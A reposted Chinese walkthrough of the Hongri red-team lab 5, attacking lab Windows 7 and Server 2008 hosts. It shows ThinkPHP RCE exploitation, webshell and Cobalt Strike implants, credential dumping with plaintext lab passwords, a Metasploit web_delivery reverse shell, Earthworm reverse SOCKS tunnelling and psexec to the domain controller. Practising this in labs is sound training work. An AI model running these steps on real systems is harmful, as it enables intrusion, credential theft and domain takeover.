红队打靶,红日系列,红日靶场5

news2024/11/15 23:49:18

文章目录

  • 靶场详情
  • 外网渗透
    • 端口扫描
    • 漏洞发现与利用
    • 获取shell
  • 内网渗透
    • 提权
    • 内网信息收集
  • 横向移动
    • 上线msf
    • 路由转发与代理通道
    • Psexec 攻击

靶场详情

此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习

Windows 7:

•Web服务器(使用的是PHPStudy,记得自己手动开一下)
•模拟外网IP:192.168.0.100
•内网IP:192.168.138.136

Windows Server 2008:

•域控制器
•内网IP:192.168.138.138

攻击者VPS:

•OS:Kali Linux
•IP:192.168.0.101

外网渗透

端口扫描

发现Web服务和Mysql:

nmap -sS -P0 -sV -O 192.168.0.100

在这里插入图片描述
访问80端口发现是个thinkphp5.0:

在这里插入图片描述
随意输入一个不存在的页面,爆出具体版本
在这里插入图片描述

漏洞发现与利用

既然是V5.0,那么我们就可以尝试一下Thinkphp远程命令执行漏洞

  1. 使用工具,发现目标存在多个漏洞
    在这里插入图片描述
    随意利用一个
    在这里插入图片描述

  2. 使用kali的searchsploit查找一下漏洞利用POC:

    searchsploit thinkphp
    

    在这里插入图片描述
    复制到桌面,查看一下poc
    在这里插入图片描述
    在这里插入图片描述

获取shell

这里我直接用的工具上传的shell,也可以根据上面kali中poc的提示写进去
在这里插入图片描述
使用冰蝎连接,外网渗透结束
在这里插入图片描述

内网渗透

提权

打开神器CS,创建监视器,生成木马
在这里插入图片描述
在这里插入图片描述
使用冰蝎将刚刚生成的马子上传到服务器并执行
在这里插入图片描述
成功上线
在这里插入图片描述
使用插件提权,权限变成了system
在这里插入图片描述

内网信息收集

接下来要做的就是信息收集了,常见姿势了解一下

 ipconfig /all   # 查看本机ip,所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 whoami          # 查看当前用户
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 
 net config workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators   # 查看本地管理员组(通常会有域用户)
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "domain controllers" /domain  # 查看域控制器(可能有多台)

目标主机所在的网络环境还存在一个192.168.138.0的网段,并且存在一个名为“sun”的域环境。
域控制器为DC$,域管理员为Administrator。
在这里插入图片描述
对内网来个大保健(详细扫描),发现内网服务器为server2008,192.168.138.138,还存在ms17010
在这里插入图片描述
使用插件提权,抓一下明文密码,成功抓取到了域管理员Administrator和域用户leo的密码:

•SUN\Administrator:dc123.com
•SUN\leo:123.com
在这里插入图片描述

横向移动

上线msf

这里我们使用metasploit的web_delivery模块:

use exploit/multi/script/web_delivery
set target 2    # 选择使用powershell类型的payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.100
exploit

在这里插入图片描述

将上面生成的payload在目标主机上执行:
在这里插入图片描述
上线成功
在这里插入图片描述
getsystem一下
在这里插入图片描述
这里也可以执行一下内网信息收集的命令

路由转发与代理通道

通过冰蝎在Windows 7上传earthworm,搭建socks5反向代理服务。
在攻击机kali上执行如下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

然后配置proxychains,将socks5服务器指向127.0.0.1:1080

vim /etc/proxychains4.conf

在这里插入图片描述
在Windows 7上传ew_for_Win.exe并执行如下:

ew_for_Win.exe -s rssocks -d 192.168.0.100 -e 1234

之后便可以使用proxychains将我们的程序代理进内网了。

Psexec 攻击

既然已经获得了域管理员的用户名密码,那么我们直接尝试使用psexec登录域控(Windows 2008):

use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass dc123.com
# set SMBPass c8c42d085b5e3da2e9260223765451f1:e8bea972b3549868cecd667a64a6ac46
set payload windows/meterpreter/bind_tcp
set rhost 192.168.138.138
run

成功上线。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/801099.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Eurographics 2023最新综述:图形学中的神经-符号模型

随着 CVPR 2023 Best Paper 的公布,其中一篇名为 VISPROG 的工作引起了广泛关注。这项工作利用自然语言指令解决复杂且组合性的视觉任务,重新将神经-符号方法带回了人们的视野,并证明了计算机视觉社区对这种方法的认可。实际上,VI…

Unity自定义后处理——用偏导数求图片颜色边缘

大家好,我是阿赵。   继续介绍屏幕后处理效果的做法。这次介绍一下用偏导数求图形边缘的技术。 一、原理介绍 先来看例子吧。   这个例子看起来好像是要给模型描边。之前其实也介绍过很多描边的方法,比如沿着法线方向放大模型,或者用Ndo…

数据结构和算法——排序算法的比较和排序综测测验

目录 排序算法的比较 排序综合测验 快又稳定 元素错位 有序排序 排序结果 排序算法的比较 排序方法平均时间复杂度最坏情况下时间复杂度额外空间复杂度稳定性简单选择排序不稳定冒泡排序稳定直接插入排序稳定希尔排序不稳定堆排序不稳定快速排序不稳定归并排序稳定基数排…

SCT2632——65V输出3A非同步整流DCDC转换器

SCT2632是一款3A降压转换器,具有宽输入电压,从4.2V到60V,集成了220mΩ高压侧MOSFET。SCT2632采用峰值电流模式控制,支持脉冲跳过调制(PSM),以帮助转换器在轻负载或待机状态下实现高效率条件。SC…

矿用人员定位系统在矿山事故预防中的效果评估

矿业行业的高风险和复杂环境使得采矿安全成为一项重要的挑战。为了保障矿工的安全并减少事故风险,矿用人员定位系统成为了关键技术之一。 在这篇文章中,华安联大便和大家各位朋友一起探讨矿用人员定位系统的重要性、工作原理、作用,并通过真…

Packet Tracer - 配置和验证 NTP

Packet Tracer - 配置和验证 NTP 地址分配表 设备 接口 IP 地址 子网掩码 N1 NIC 209.165.200.225 255.255.255.0 R1 G0/0 209.165.200.226 255.255.255.0 R2 G0/0 209.165.200.227 255.255.255.0 目标 在本练习中,您将在 R1 和 R2 中配置 NTP 以…

苍穹外卖day07——缓存菜品套餐+购物车功能实现

缓存菜品——需求设计与分析 问题说明 用户访问量过大带来的一个直接效果就是响应速度慢,使用体验下降。 实现思路 使用redis缓存菜品数据,减少数据库查询操作。 页面展示上基本就是同一个分类在同一页,所以key-value结构可以使用不同的分…

【SQL应知应会】表分区(二)• Oracle版

欢迎来到爱书不爱输的程序猿的博客, 本博客致力于知识分享,与更多的人进行学习交流 本文收录于SQL应知应会专栏,本专栏主要用于记录对于数据库的一些学习,有基础也有进阶,有MySQL也有Oracle 分区表 • Oracle版 前言一、分区表1.什么是表分区…

富文本编辑器wangEditor初探

1、前言 现有的Quill比较简单,无法满足业务需求(例如SEO的图片属性编辑需求) Quill已经有比较长的时间没有更新了,虽然很灵活,但是官方demo都没有一个。 业务前期也没有这块的需求,也没有考虑到这块的扩展…

如何提高代码效率——时间复杂度与空间复杂度——【C语言】

当我们面对一个问题时,会有许多种解题思路。我们现在的计算机技术已经达到非常先进的地步,所以当我们用不同的方法对待问题时,时间差异不会很明显,内存差异我们一般在平常小问题时感受不到,所以我们不会去纠结程序的优…

基于ssm+mysql+html道路养护管理系统

基于ssmmysqlhtml道路养护管理系统 一、系统介绍二、功能展示1.道路信息管理2.损害类型信息管理3.损害类型信息管理4.评定等级信息管理5.日常巡查信息管理6.定期检查信息管理 四、获取源码 一、系统介绍 系统主要功能:道路信息管理、损害类型信息管理、评定等级信息…

VSCode SSH远程连接与删除

1.ubuntu设置 安装SSH服务并获取远程访问的IP地址 在Ubuntu系统中,“CtrlAltT”打开终端工具,执行如下命令安装SSH服务。 sudo apt-get install openssh-server如果安装失败则先安装依赖项。 2.VS Code 设置 2.1安装与设置Remote SSH 打开Windows系…

今天,我被二维码卷到了...

# 关注并星标腾讯云开发者# 每周4 | 鹅厂一线程序员,为你“试毒”新技术# 第1期 | 腾讯王锐:测评二维码艺术画生成体验 都说AI绘画来势汹汹,但论创意,还是人类玩得花🤫。下面这几张乍一看平平无奇、却在网上疯传的AI生…

rcu链表综合实践

基础知识 rcu-read copy update的缩写。和读写锁起到相同的效果。据说牛逼一点。对于我们普通程序员,要先学会使用,再探究其内部原理。 链表的数据结构: struct list_head {struct list_head *next, *prev; };还有一种:struct h…

自建纯内网iot平台服务,软硬件服务器全栈实践

基于以下几个考虑,自制硬件设备,mqtt内网服务器。 1.米家app不稳定,逻辑在云端或xiaomi中枢网关只支持少部分在本地计算。 2.监控homeassistant官方服务有大量数据交互。可能与hass安装小米账户有关。 3.硬件:原理图,l…

apifox 调用camunda engine-rest接口报错“type“: “NotFoundException“

官方文档在这: https://docs.camunda.org/rest/camunda-bpm-platform/7.19/ 现象 engine-rest本是可以直接请求的,我把openapi导入到apifox之中了,我测试一下接口没有能请求成功的,基本都报以下的错。 报错如下 {"type&qu…

【iOS】Frame与Bounds的区别详解

iOS的坐标系 iOS特有的坐标是,是在iOS坐标系的左上角为坐标原点,往右为X正方向,向下为Y正方向。 bounds和frame都是属于CGRect类型的结构体,系统的定义如下,包含一个CGPoint(起点)和一个CGSiz…

《向量数据库指南》:向量数据库Pinecone如何集成Haystack库

目录 安装Haystack库 初始化PineconeDocumentStore 数据准备 初始化检索器 检查文档和嵌入 初始化提取式问答管道 提问 在这个指南中,我们将看到如何集成Pinecone和流行的Haystack库进行问答。 安装Haystack库 我们首先安装最新版本的Haystack,其中包括PineconeDocum…

【爬虫案例】用Python爬取iPhone14的电商平台评论

用python爬取某电商网站的iPhone14评论数据, 爬取目标: 核心代码如下: 爬取到的5分好评: 爬取到的3分中评: 爬取到的1分差评: 所以说,用python开发爬虫真的很方面! 您好&…

Shell ❀ 一键配置Iptables规则脚本 (HW推荐)

文章目录 注意事项1. 地址列表填写规范2. 代码块3. 执行结果4. 地址与端口获取方法4.1 tcpdump抓包分析(推荐使用)4.2 TCP连接分析(仅能识别TCP连接) 注意事项 请务必按照格式填写具体参数,否则会影响到匹配规则的创建…